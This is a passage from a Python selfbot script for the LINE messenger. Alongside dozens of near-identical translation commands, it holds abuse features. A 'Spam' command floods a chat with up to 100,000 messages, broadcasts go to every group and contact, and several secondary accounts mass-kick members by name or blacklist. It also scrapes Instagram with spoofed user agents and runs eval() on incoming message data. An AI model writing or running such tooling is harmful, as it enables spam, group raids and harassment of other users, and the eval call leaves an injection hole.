sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='lt')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-lb "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='lb')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mk "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mk')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mg "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mg')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ms "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ms')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ml "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ml')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mt "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mt')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mi "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mi')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mr "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mr')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mn "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mn')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-my "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='my')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ne "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ne')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-no "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='no')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ps "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ps')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fa "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fa')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-pl "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='pl')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-pt "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='pt')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-pa "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='pa')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ro "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ro')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ru "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ru')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sm "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sm')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-gd "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='gd')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sr "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sr')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-st "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='st')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sn "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sn')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sd "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sd')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-si "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='si')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sk "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sk')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sl "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sl')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-so "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='so')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-es "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='es')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-su "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='su')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sw "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sw')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sv "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sv')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-tg "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='tg')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ta "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ta')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-te "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='te')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-th "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='th')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-tr "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='tr')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-uk "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='uk')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ur "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ur')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-uz "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='uz')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-vi "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='vi')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-cy "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='cy')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-xh "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='xh')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-yi "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='yi')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-yo "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='yo')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-zu "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='zu')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fil "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fil')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-he "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='he')
A = hasil.text
line.sendMessage(msg.to, A)
elif "Bcvoice " in msg.text:
bctxt = msg.text.replace("Bcvoice ", "")
bc = ("⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ \nŦ€Āʍ ĦĀ¢₭€Ɖ ĊΦƉ€")
cb = (bctxt + bc)
tts = gTTS(cb, lang='id', slow=False)
tts.save('tts.mp3')
n = line.getGroupIdsJoined()
for manusia in n:
line.sendAudio(manusia, 'tts.mp3')
elif "Cbcvoice " in msg.text:
bctxt = msg.text.replace("Cbcvoice ", "")
bc = ("⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ \nŦ€Āʍ ĦĀ¢₭€Ɖ ĊΦƉ€")
cb = (bctxt + bc)
tts = gTTS(cb, lang='id', slow=False)
tts.save('tts.mp3')
n = line.getAllContactIdsJoined()
for manusia in n:
line.sendAudio(manusia, 'tts.mp3')
elif "Dow " in msg.text:
try:
wiki = msg.text.lower().replace("Dow ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
line.sendMessage(msg.to, pesan)
except:
try:
pesan="เกินขีด จำกัด ข้อความ! โปรดคลิกลิงก์\n"
pesan+=wikipedia.page(wiki).url
line.sendText(msg.to, pesan)
except Exception as e:
line.sendMessage(msg.to, str(e))
elif "ค้นหาหนัง" in msg.text:
proses = msg.text.split(":")
get = msg.text.replace(proses[0] + ":","")
getfilm = get.split()
title = getfilm[0]
tahun = getfilm[1]
r = requests.get('http://www.omdbapi.com/?t='+title+'&y='+tahun+'&plot=full&apikey=4bdd1d70')
start = time.time()
data=r.text
data=json.loads(data)
hasil = "Informasi \n" +str(data["Title"])+ " (" +str(data["Year"])+ ")"
hasil += "\n\n " +str(data["Plot"])
hasil += "\n\nDirector : " +str(data["Director"])
hasil += "\nActors : " +str(data["Actors"])
hasil += "\nRelease : " +str(data["Released"])
hasil += "\nGenre : " +str(data["Genre"])
hasil += "\nRuntime : " +str(data["Runtime"])
path = data["Poster"]
line.sendImageWithURL(msg.to, str(path))
line.sendMessage(msg.to,hasil)
elif text.lower() == 'Day':
tz = pytz.timezone("Asia/Makassar")
timeNow = datetime.now(tz=tz)
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
hr = timeNow.strftime("%A")
bln = timeNow.strftime("%m")
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
readTime = hasil + ", " + timeNow.strftime('%d') + " - " + bln + " - " + timeNow.strftime('%Y') + "\nJam : [ " + timeNow.strftime('%H:%M:%S') + " ]"
line.sendMessage(msg.to, readTime)
elif "ค้นหาอินสตาแกรม" in msg.text.lower():
sep = text.split(" ")
search = text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://www.instagram.com/{}/?__a=1".format(search))
try:
data = json.loads(r.text)
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
ret_ += "\n ชื่อ {}".format(str(data["user"]["full_name"]))
ret_ += "\n ยูเซอเนม : {}".format(str(data["user"]["username"]))
ret_ += "\n ตัส {}".format(str(data["user"]["biography"]))
ret_ += "\n ผู้ติดตาม {}".format(format_number(data["user"]["followed_by"]["count"]))
ret_ += "\n ติดตาม {}".format(format_number(data["user"]["follows"]["count"]))
if data["user"]["is_verified"] == True:
ret_ += "\n การยืนยัน: แล้ว"
else:
ret_ += "\n การยืนยัน: ยังไม่ได้"
if data["user"]["is_private"] == True:
ret_ += "\n Akun Pribadi : Iya"
else:
ret_ += "\n บัญชีส่วนบุคคล: ไม่"
ret_ += "\n Post : {}".format(format_number(data["user"]["media"]["count"]))
ret_ += "\n[ https://www.instagram.com/{} ]".format(search)
path = data["user"]["profile_pic_url_hd"]
line.sendImageWithURL(to, str(path))
line.sendMessage(to, str(ret_))
except:
line.sendMessage(to, "ไม่พบผู้ใช้")
line.sendMessage(to, str(ret_))
elif "ค้นหารูป" in msg.text.lower():
separate = msg.text.split(" ")
search = msg.text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("http://rahandiapi.herokuapp.com/imageapi?key=betakey&q={}".format(urllib.parse.quote(search)))
data = r.text
data = json.loads(data)
if data["result"] != []:
items = data["result"]
path = random.choice(items)
a = items.index(path)
b = len(items)
line.sendImageWithURL(to, str(path))
elif "รูปการตูน" in msg.text.lower():
separate = msg.text.split(" ")
search = msg.text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("http://rahandiapi.herokuapp.com/imageapi?key=betakey&q={}".format(urllib.parse.quote(search)))
data = r.text
data = json.loads(data)
if data["result"] != []:
items = data["result"]
path = random.choice(items)
a = items.index(path)
b = len(items)
line.sendImageWithURL(to, str(path))
elif "ค้นหายูทูป" in msg.text.lower():
sep = text.split(" ")
search = text.replace(sep[0] + " ","")
params = {"search_query": search}
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://www.youtube.com/results", params = params)
soup = BeautifulSoup(r.content, "html.parser")
ret_ = "การค้นหามีรายละเอียดตามนี้"
datas = []
for data in soup.select(".yt-lockup-title > a[title]"):
if "&lists" not in data["href"]:
datas.append(data)
for data in datas:
ret_ += "\n⋙ {} ]".format(str(data["title"]))
ret_ += "\n⋙ https://www.youtube.com{}".format(str(data["href"]) + "\n")
ret_ += "\n\n⋙ ที่พบ {} คลิป".format(len(datas))
line.sendMessage(to, str(ret_))
elif msg.text in ["อ่านออโต้เปิด"]:
try:
del RfuCctv['point'][msg.to]
del RfuCctv['sidermem'][msg.to]
del RfuCctv['cyduk'][msg.to]
except:
pass
RfuCctv['point'][msg.to] = msg.id
RfuCctv['sidermem'][msg.to] = ""
RfuCctv['cyduk'][msg.to]=True
line.sendMessage(msg.to," ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️")
elif msg.text in ["อ่านออโต้ปิด"]:
if msg.to in RfuCctv['point']:
RfuCctv['cyduk'][msg.to]=False
line.sendText(msg.to, RfuCctv['sidermem'][msg.to])
else:
line.sendMessage(msg.to, " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️")
elif text.lower() == 'รายการเพื่อน':
contactlist = line.getAllContactIds()
kontak = line.getContacts(contactlist)
num=1
msgs="⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\nจำนวน %i" % len(kontak)
line.sendMessage(msg.to, msgs)
elif msg.text in ["รายการบล็อค"]:
blockedlist = line.getBlockedContactIds()
kontak = line.getContacts(blockedlist)
num=1
msgs="⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\nจำนวน %i" % len(kontak)
line.sendMessage(receiver, msgs)
elif msg.text in ["รายการmid"]:
gruplist = line.getAllContactIds()
kontak = line.getContacts(gruplist)
num=1
msgs="⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.mid)
num=(num+1)
msgs+="\nจำนวน %i" % len(kontak)
line.sendMessage(receiver, msgs)
elif msg.text.lower() == 'เชิญกุ':
if msg.toType == 2:
ginfo = line.getGroup(receiver)
try:
gcmid = ginfo.creator.mid
except:
gcmid = "Error"
if settings["lang"] == "JP":
line.inviteIntoGroup(receiver,[gcmid])
line.sendMessage(receiver, "พิมพ์คำเชิญกลุ่ม")
else:
line.inviteIntoGroup(receiver,[gcmid])
line.sendMessage(receiver, "ผู้สร้างกลุ่มอยู่ในแล้ว")
elif msg.text in ["ออก"]:
if msg.toType == 2:
ginfo = line.getGroup(receiver)
try:
line.leaveGroup(receiver)
ki.leaveGroup(receiver)
kk.leaveGroup(receiver)
kc.leaveGroup(receiver)
ke.leaveGroup(receiver)
except:
pass
elif msg.text in ["แท็กเปิด"]:
settings["detectMention"] = True
line.sendMessage(msg.to,"เปิดระบบข้อความแท็ก")
elif msg.text in ["แท็กปิด"]:
settings["detectMention"] = False
line.sendMessage(msg.to,"ปิดระบบข้อความแท็ก")
elif 'ตั้งแท็ก: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('ตั้งแท็ก: ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "ตั้งข้อความเรืยบร้อย")
else:
settings["Respontag"] = spl
line.sendMessage(msg.to, "⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️\n\n{}".format(str(spl)))
elif 'ทักออก: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('ทักออก: ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "ตั้งข้อความคนออกเรียบร้อย")
else:
settings["bye"] = spl
line.sendMessage(msg.to, "⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️\n\n\n{}".format(str(spl)))
elif 'ทักเข้า: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('ทักเข้า: ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "ตั้งข้อความคนเข้าเรียบร้อยแล้ว")
else:
settings["welcome"] = spl
line.sendMessage(msg.to, "⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️\n\n\n{}".format(str(spl)))
elif msg.text.lower().startswith("ภาพ "):
sep = msg.text.split(" ")
textnya = msg.text.replace(sep[0] + " ","")
urlnya = "http://chart.apis.google.com/chart?chs=480x80&cht=p3&chtt=" + textnya + "&chts=FFFFFF,70&chf=bg,s,000000"
line.sendImageWithURL(msg.to, urlnya)
elif text.lower() == 'ลบรัน':
gid = line.getGroupIdsInvited()
start = time.time()
for i in gid:
line.rejectGroupInvitation(i)
elapsed_time = time.time() - start
line.sendMessage(to, "ลบแล้วจร้าา")
line.sendMessage(to, "เวลาที่ใฃ้: %sวินาที" % (elapsed_time))
elif text.lower() == 'zt':
gs = line.getGroup(to)
targets = []
for g in gs.members:
if g.displayName in "":
targets.append(g.mid)
if targets == []:
line.sendMessage(to, "ม่มีคนใส่ร่องหนในกลุ่มนี้😂")
else:
mc = ""
for target in targets:
mc += sendMessageWithMention(to,target) + "\n"
line.sendMessage(to, mc)
elif text.lower() == 'zm':
gs = line.getGroup(to)
lists = []
for g in gs.members:
if g.displayName in "":
lists.append(g.mid)
if lists == []:
line.sendMessage(to, "ไม่มีmidคนใส่ร่องหน🤗")
else:
mc = ""
for mi_d in lists:
mc += "->" + mi_d + "\n"
line.sendMessage(to,mc)
elif text.lower() == 'zc':
gs = line.getGroup(to)
lists = []
for g in gs.members:
if g.displayName in "":
lists.append(g.mid)
if lists == []:
line.sendMessage(to, "ไม่มีคนใส่ร่องหนในกลุ่มนี้😂")
else:
for ls in lists:
contact = line.getContact(ls)
mi_d = contact.mid
line.sendContact(to, mi_d)
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
line.sendMessage(msg.to, teks)
else:
line.sendMessage(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
line.sendMessage(msg.to, tulisan)
else:
line.sendMessage(msg.to, "Out Of Range!")
elif 'ลบเชิญS' in msg.text.lower():
if msg.toType == 2:
X = line.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
line.cancelGroupInvitation(msg.to, gInviMids)
else:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ไม่มีการเชิญ")
else:
line.sendMessage(msg.to,"ขออภัยไม่มี")
else:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ไม่สามารถใช้นอกกลุ่มได้")
else:
line.sendMessage(msg.to,"ไม่ใช้งานน้อยกว่ากลุ่ม")
elif 'ตั้งคนออก: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('ตั้งคนออก: ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "ตั้งคนออก")
else:
settings["Nn"] = spl
line.sendMessage(msg.to, "{}".format(str(spl)))
elif 'ตั้งคนเข้า: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('ตั้งคนเข้า: ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "ตั้งคนออก")
else:
settings["Sd"] = spl
line.sendMessage(msg.to, "{}".format(str(spl)))
elif msg.text in ["เชิญ"]:
settings["winvite"] = True
line.sendMessage(msg.to,"ส่งรายชื่อเพื่อเชิญ")
elif msg.text in ["cb"]:
settings["blacklist"] = {}
line.sendMessage(msg.to,"ทำการลบัญชีดำทั้งหมดเรียบร้อย")
print ("Clear Ban")
elif text.lower() == 'Sai':
if msg.toType == 2:
group = line.getGroup(to)
group.preventedJoinByTicket = False
line.updateGroup(group)
invsend = 0
ticket = line.reissueGroupTicket(to)
ki.acceptGroupInvitationByTicket(to,format(str(ticket)))
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(to,format(str(ticket)))
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(to,format(str(ticket)))
time.sleep(0.01)
ke.acceptGroupInvitationByTicket(to,format(str(ticket)))
time.sleep(0.01)
group.preventedJoinByTicket = True
line.updateGroup(group)
print ("คลิ้กเข้า ")
elif 'เตะ' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
random.choice(Rfu).kickoutFromGroup(msg.to,[target])
print ("เตะคน")
except:
random.choice(Rfu).sendMessage(msg.to,"จำกัด")
elif 'เตะ1' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
line.kickoutFromGroup(msg.to,[target])
print ("เตะคน1")
except:
line.sendMessage(msg.to,"จำกัด")
elif '1 ' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki.kickoutFromGroup(msg.to,[target])
print ("คลิ้ก1เตะ")
except:
ki.sendMessage(msg.to,"จำกัด")
elif '2 ' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
kk.kickoutFromGroup(msg.to,[target])
print ("คลิ้ก2เตะ")
except:
kk.sendMessage(msg.to,"จำกัด")
elif '3 ' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
kc.kickoutFromGroup(msg.to,[target])
print ("คลิ้ก3เตะ")
except:
kc.sendMessage(msg.to,"จำกัด")
elif 'เชิญ' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
line.inviteIntoGroup(msg.to,[target])
line.sendMessage(receiver, "เชิญok")
except:
line.sendMessage(msg.to,"จำกัด การเชิญ")
elif '1เชิญ' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki.inviteIntoGroup(msg.to,[target])
ki.sendMessage(receiver, "เชิญok")
print ("R1 invite User")
except:
ki.sendMessage(msg.to,"จำกัด การเชิญ")
elif '2เชิญ' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
kk.inviteIntoGroup(msg.to,[target])
kk.sendMessage(receiver, "เชิญok")
("R2 invite User")
except:
kk.sendMessage(msg.to,"จำกัด การเชิญ")
elif '3เชิญ' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
kc.inviteIntoGroup(msg.to,[target])
kc.sendMessage(receiver, "เชิญ")
("R3 invite User")
except:
kc.sendMessage(msg.to,"จำกัด การเชิญ")
elif "Cleanse" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Cleanse","")
gs = line.getGroup(receiver)
line.sendMessage(receiver,"Just some casual cleansing ô")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
line.sendMessage(receiver,"Not found.")
else:
for target in targets:
if not target in Rfu:
try:
klist=[line,ki,kk,kc,ke]
kicker=random.choice(klist)
kicker.kickoutFromGroup(receiver,[target])
print((receiver,[g.mid]))
except:
line.sendMessage(receiver,"Group cleanse")
print ("Cleanse Group")
elif msg.text in ["เตะดำ"]:
if msg.toType == 2:
group = line.getGroup(receiver)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in settings["blacklist"]:
matched_list+=[str for str in gMembMids if str == tag]
if matched_list == []:
line.sendMessage(receiver,"ไม่มีบัญชีดำ")
else:
for jj in matched_list:
try:
klist=[line,ki,kk,kc,ke]
kicker=random.choice(klist)
kicker.kickoutFromGroup(receiver,[jj])
print((receiver,[jj]))
except:
line.sendMessage(receiver,"เตะกุเตะกลับ")
print ("ไล่เตะดำ")
elif text.lower() == "ลบแชท":
if msg._from in Family:
try:
line.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
ke.removeAllMessages(op.param2)
line.sendMessage(msg.to,"ลบทุกการแชทเรียบร้อย")
except:
pass
print ("ลบแชท")
elif text.lower() == "ออก1":
if msg._from in Family:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ke.leaveGroup(msg.to)
print ("Kicker Leave")
elif text.lower() == "ออกแชทรวม":
if msg._from in Family:
gid = line.getGroupIdsJoined()
for i in gid:
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
ke.leaveGroup(i)
print ("ออกแชท")
elif "ชื่อ: " in text.lower():
if msg._from in Family:
proses = text.split(": ")
string = text.replace(proses[0] + ": ","")
profile_A = line.getProfile()
profile_A.displayName = string
line.updateProfile(profile_A)
line.sendMessage(msg.to,"ok เปลี่ยนแล้ว เปลี่ยวเป็น " + string)
print ("Update Name")
elif "ตัส: " in msg.text.lower():
if msg._from in Family:
proses = text.split(": ")
string = text.replace(proses[0] + ": ","")
profile_A = line.getProfile()
profile_A.statusMessage = string
line.updateProfile(profile_A)
line.sendMessage(msg.to,"ok คุณได้เปลี่ยนแล้ว เป็น " + string)
print ("Update Bio Succes")
elif "คลิ้ก: " in text.lower():
if msg._from in Family:
proses = text.split(": ")
string = text.replace(proses[0] + ": ","")
profile_A = ki.getProfile()
profile_B = kk.getProfile()
profile_C = kc.getProfile()
profile_D = ke.getProfile()
